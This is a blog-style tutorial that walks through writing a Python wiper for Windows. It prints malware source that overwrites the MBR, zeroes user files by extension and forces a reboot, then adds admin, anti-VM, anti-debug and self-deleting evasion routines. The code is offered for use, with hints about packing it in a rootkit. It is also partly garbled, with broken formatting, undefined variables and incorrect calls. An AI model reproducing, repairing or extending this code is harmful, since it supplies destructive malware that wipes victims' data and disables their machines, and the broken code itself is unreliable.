A wiper is a class of malware intended to erase (wipe, hence the name) the hard drive of the computer it infects, maliciously deleting data and programs.
Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found this awesome article by @0xf00I that I'll be using as my main reference for this. This malware works in 4 primary stages:
Destroy files content
Destroy MBR
Remove self
Shut it down!
Let's look at a simple python wiper. Assuming that you got a rootkit to pack with this sucker, here's a simple program to wipe all things off of a windows system:
import os import subprocessimport ctypesfrom ctypes import wintypesimport win32apistartupinfo = subprocess.STARTUPINFO()#type: ignore drives = win32api.GetLogicalDriveStrings()kernel32 = ctypes.WinDLL('kernel32')defOverWriteMBR(): hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001|0x00000002, None, 3, 0,0)# Create a handle to our Physical Drive Kernel32.WriteFile(hDevice, Data, None)# Overwrite the MBR! (Never run this on your main machine!) Kernel32.CloseHandle(hDevice)# Close the handle to our Physical Drive!defSetFiles(): ext = [".m2ts",".mkv",".mov",".mp4",".mpg",".mpeg",".rm",".swf",".vob",".wmv"".docx",".pdf",".rar",".jpg",".jpeg",".png",".tiff",".zip",".7z",".tar.gz",".tar",".mp3",".sh",".c",".cpp",".h",".gif",".txt",".jar",".sql",".bundle",".sqlite3",".html",".php",".log",".bak",".deb"] # files to seek out and overwritefor dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"):for f in files: path = os.path.abspath(os.path.join(dirpath, f))if f.endswith(tuple(ext)):withopen(f, "rb")as files: data = files.read() files.close()withopen(f, "wb")as files: data.write(b'\x00')# Overwrites multiple files with zero bytes (hex 00) data.close()defSysDown():# InitiateSystemShutdown() os.system("shutdown -t 0 -r -f ")defmain():global application_path ifgetattr(sys, 'frozen', False): application_path = sys.executableelse: application_path = os.path.dirname(os.path.abspath(__file__))SetFiles()OverWriteMBR()if__name__=="__main__":main()SysDown()
Simple as that! Run this as admin and it'll remove everything including the MBR. Neat right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @0xf00I 's skywiper repo...)
For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:
defIsAdmin():""" it checks if it has Administrator privileges, if it doesn't it runs itself using the ShellExecute trick and exits immediately if it does, it performs the task at hand. """try:return ctypes.windll.shell32.IsUserAnAdmin()except:returnFalse
defAntiVm(): Process = ["vmsrvc.exe","vmusrvc.exe","vboxtray.exe","vmtoolsd.exe","df5serv.exe","vboxservice.exe"]for process in psutil.process_iter():for i in Process:if i in process.name().lower():returnCommitSuicide()defAntiDebug(): isDebuggerPresent = windll.kernel32.IsDebuggerPresent()if (isDebuggerPresent):returnCommitSuicide()defCommitSuicide(): file_path = os.path.abspath(__file__) os.remove(file_path) folder_path = os.path.dirname(file_path) os.system("cipher /W:%s"% folder_path)# At the end of the script, the file is deleted & over-written
You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~